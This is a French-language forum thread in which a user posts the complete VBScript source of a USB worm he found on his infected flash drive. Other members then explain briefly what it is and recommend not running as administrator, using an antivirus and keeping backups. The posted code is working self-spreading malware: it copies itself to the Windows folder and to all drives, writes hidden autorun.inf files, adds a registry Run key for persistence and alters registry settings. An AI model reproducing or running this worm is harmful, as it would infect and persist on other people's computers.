[DENEKAR]

DENEKAR
Projets


 

Inscrit le: 15 Jan 2010 Messages: 12

Voilà, un pote a été infecté par un ver et il se trouve que je lui avais passé ma clef, que j'ai récupérée infectée.
Heureusement, j'avais booté sur Ubuntu, donc aucun soucis
Je vous donne le code:

Code:

'My name is Slow but sure V0.05 on error resume next dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe MS32DLL.dll.vbs" set fs = createobject("Scripting.FileSystemObject") set mf = fs.getfile(Wscript.ScriptFullname) dim text,size size = mf.size check = mf.drive.drivetype set text=mf.openastextstream(1,-2) do while not text.atendofstream mysource=mysource&text.readline mysource=mysource & vbcrlf loop do Set winpath = fs.getspecialfolder(0) set tf = fs.getfile(winpath & "\MS32DLL.dll.vbs") tf.attributes = 32 set tf=fs.createtextfile(winpath & "\MS32DLL.dll.vbs",2,true) tf.write mysource tf.close set tf = fs.getfile(winpath & "\MS32DLL.dll.vbs") tf.attributes = 39 for each flashdrive in fs.drives If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then set tf=fs.getfile(flashdrive.path &"\MS32DLL.dll.vbs") tf.attributes =32 set tf=fs.createtextfile(flashdrive.path &"\MS32DLL.dll.vbs",2,true) tf.write mysource tf.close set tf=fs.getfile(flashdrive.path &"\MS32DLL.dll.vbs") tf.attributes =39 set tf =fs.getfile(flashdrive.path &"\autorun.inf") tf.attributes = 32 set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true) tf.write atr tf.close set tf =fs.getfile(flashdrive.path &"\autorun.inf") tf.attributes=39 end if next set rg = createobject("WScript.Shell") rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL",winpath&"\MS32DLL.dll.vbs" rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by Godzilla" rg.regwrite "HKCR\vbsfile\DefaultIcon","shell32.dll,2" if check <> 1 then Wscript.sleep 200000 end if loop while check<>1 set sd = createobject("Wscript.shell") sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname

[EMRE]

EMRE
Projets


 

Inscrit le: 04 Avr 2010 Messages: 10

Étant novice tu peux me dire a quoi sert tout ceci

[Manu404]

Manu404
Projets


 

Inscrit le: 26 Fév 2008 Messages: 1536 Localisation: Belgique

Halala, très simple ce code.
Bizare que ton antivirus ne l'ai pas détecté (en as tu un ???)
De plus, pourquoi reste tu en admin ? Pour exécuter le code des droits d'admin son nécessaire, donc si tu utilisais un utilisateur simple, tu n'aurais pas de soucis...
Et pour finir, il modifier/lis des register key.

Enfin bref, pour éviter ce genre de crasse :
Utiliser un user admin que quand c'est absolument nécessaire
Installer un antivir/antispy
Faire des backup régulièrement

[EMRE]

EMRE
Projets


 

Inscrit le: 04 Avr 2010 Messages: 10

Ben je suis en admin.

[Manu404]

Manu404
Projets


 

Inscrit le: 26 Fév 2008 Messages: 1536 Localisation: Belgique

Ouais bein justement --'
Relis mon poste et rend toi compte de ce que tu vien de dire...

[S]

S
Projets


 

Inscrit le: 27 Mar 2008 Messages: 193

	EMRE a écrit:
	Étant novice tu peux me dire a quoi sert tout ceci

C'est un vers sa sert a infecté ton PC (et ou a apprendre comment il fonctionne)!